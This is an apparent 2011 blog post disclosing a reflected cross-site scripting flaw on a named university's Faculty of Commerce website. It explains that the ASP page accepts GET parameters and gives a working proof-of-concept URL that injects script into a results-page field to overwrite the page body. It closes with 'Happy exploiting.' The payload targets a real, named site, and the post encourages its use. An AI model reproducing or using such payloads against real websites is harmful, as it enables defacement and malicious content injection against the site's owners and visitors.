Archive for March, 2011

Alexandrea University: Faculty of Commerce.. vulnerable to XSS

Posted in XSS with tags , , , on March 13, 2011 by Xacker

Hi again,

The Faculty of Commerce at Alexandrea university is found vulnerable to XSS attacks.

An attacker could easily lure the victim into clicking a malicious URL that could be used to display malicious or possibly incorrect content on the web page.

Although the form specifies POST requests instead of GET in the source-code, the ASP web page is coded to handle both, perhaps, with POST preferred over GET if provided.

PoC:

hxxp://www.alex-commerce.edu.eg/Result42.asp?fld1=%22%3E%3Cscript%3Edocument.getElementsByTagName%28%27body%27%29[0].innerHTML=%27%3Ch1%3EXSS%20Vulnerability%20-%20by%20Xacker%3C/h1%3E%27%3C/script%3E

Happy exploiting.

Advertisements